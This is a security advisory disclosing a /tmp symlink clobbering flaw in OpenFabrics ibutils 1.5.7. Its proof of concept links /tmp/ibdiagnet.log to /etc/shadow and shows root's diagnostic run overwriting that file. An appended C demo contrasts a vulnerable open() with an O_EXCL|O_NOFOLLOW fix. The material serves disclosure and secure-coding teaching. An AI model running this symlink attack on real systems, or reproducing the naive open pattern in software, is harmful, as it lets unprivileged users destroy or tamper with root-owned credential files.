`OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability
3/6/2013
Larry W. Cashdollar
@_larry0
The InfiniBand diagnostic utility handles files in /tmp insecurely. A malicious user can clobber root-owned files with common symlink attacks.
http://www.openfabrics.org/downloads/ibutils/
[nobody@exdb01 tmp]$ ln -s /etc/shadow ibdiagnet.log
[nobody@exdb01 tmp]$ ls -l ibdiagnet.log
lrwxrwxrwx 1 nobody users 11 Mar 6 18:19 ibdiagnet.log -> /etc/shadow
[nobody@exdb01 tmp]$
The following files are created; I imagine any one of them can be used.
[root@exdb01 tmp]# ls -l /tmp/ibdiagnet*
-rw-r--r-- 1 root root 57611 Mar 6 18:20 /tmp/ibdiagnet.db
-rw-r--r-- 1 root root 830 Mar 6 18:20 /tmp/ibdiagnet.fdbs
-rw-r--r-- 1 root root 5805 Mar 6 18:20 /tmp/ibdiagnet_ibis.log
-rw-r--r-- 1 root root 2359 Mar 6 18:20 /tmp/ibdiagnet.log
-rw-r--r-- 1 root root 7072 Mar 6 18:20 /tmp/ibdiagnet.lst
-rw-r--r-- 1 root root 456 Mar 6 18:20 /tmp/ibdiagnet.mcfdbs
-rw-r--r-- 1 root root 784 Mar 6 18:20 /tmp/ibdiagnet.pkey
-rw-r--r-- 1 root root 3348 Mar 6 18:20 /tmp/ibdiagnet.psl
-rw-r--r-- 1 root root 179228 Mar 6 18:20 /tmp/ibdiagnet.slvl
-rw-r--r-- 1 root root 193 Mar 6 18:20 /tmp/ibdiagnet.sm
After root runs a diagnostic command:
[root@exdb01 tmp]# ibdiagnet -ls 10 -lw 4x -vlr
Loading IBDIAGNET from: /usr/lib64/ibdiagnet1.5.7
-W- Topology file is not specified.
Reports regarding cluster links will use direct routes.
Loading IBDM from: /usr/lib64/ibdm1.5.7
-W- A few ports of local device are up.
Since port-num was not specified (-p option), port 1 of device 1 will be used as the local port.
-I- Discovering ... 7 nodes (2 Switches & 5 CA-s) discovered.
.
.
.
.
Extracting SL Based Routing Info 0 0
Please see /tmp/ibdiagnet.log for complete log
-I- Done. Run time was 2 seconds.
Symlinked files are overwritten:
[root@exdb01 tmp] ls -l /etc/shadow
-rw------- 1 root root 2359 Mar 6 18:17 /etc/shadow
[root@exdb01 tmp] head /etc/shadow
-W- Topology file is not specified.
Reports regarding cluster links will use direct routes.
-W- A few ports of local device are up.
Since port-num was not specified (-p option), port 1 of device 1 will be used as the local port.
-I- Discovering ... 7 nodes (2 Switches & 5 CA-s) discovered.
-I---------------------------------------------------
-I- Bad Guids/LIDs Info
Versions installed
[root@exdb01 tmp] rpm -aq |grep ibutils
ibutils-1.5.7-1.el5
ibutils-libs-1.5.7-1.el5
ibutils-devel-1.5.7-1.el5
[root@exdb01 tmp]
`
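The C program below is an added example, not code from ibutils or from the advisory. It contrasts an open that follows a pre-existing symlink at a predictable log name with one that uses O_CREAT|O_EXCL|O_NOFOLLOW, which is the usual fix for this class of /tmp bug. The function names, the scratch directory and the "victim" stand-in file are assumptions constructed for the demonstration; how ibutils itself opens its files is not shown on the page.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern behind the clobbering: create/truncate a predictable name, following symlinks. */
int open_log_naive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened: O_EXCL fails if the name already exists (a symlink included),
 * O_NOFOLLOW refuses a link in the final path component. */
int open_log_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario inside a private mkdtemp() directory: "victim" stands in
 * for the root-owned file; "ibdiagnet.log" is a symlink that exists before the
 * log is opened. Returns 1 if the victim is intact, 0 if overwritten, -1 on setup error. */
int victim_survives(int (*open_log)(const char *)) {
    char dir[] = "/tmp/symdemo.XXXXXX", victim[64], logp[64], buf[32] = "";
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(logp, sizeof logp, "%s/ibdiagnet.log", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("secret", f);
    fclose(f);
    if (symlink(victim, logp) != 0) return -1;
    int fd = open_log(logp);               /* the privileged tool opening its log */
    if (fd >= 0) {
        ssize_t n = write(fd, "-I- Done.\n", 10);
        (void)n;
        close(fd);
    }
    f = fopen(victim, "r");
    if (!f) return -1;
    if (!fgets(buf, sizeof buf, f)) buf[0] = '\0';
    fclose(f);
    unlink(logp); unlink(victim); rmdir(dir);
    return strcmp(buf, "secret") == 0;
}

int main(void) {
    printf("naive open: victim intact = %d\n", victim_survives(open_log_naive));
    printf("safe open:  victim intact = %d\n", victim_survives(open_log_safe));
    return 0;
}
```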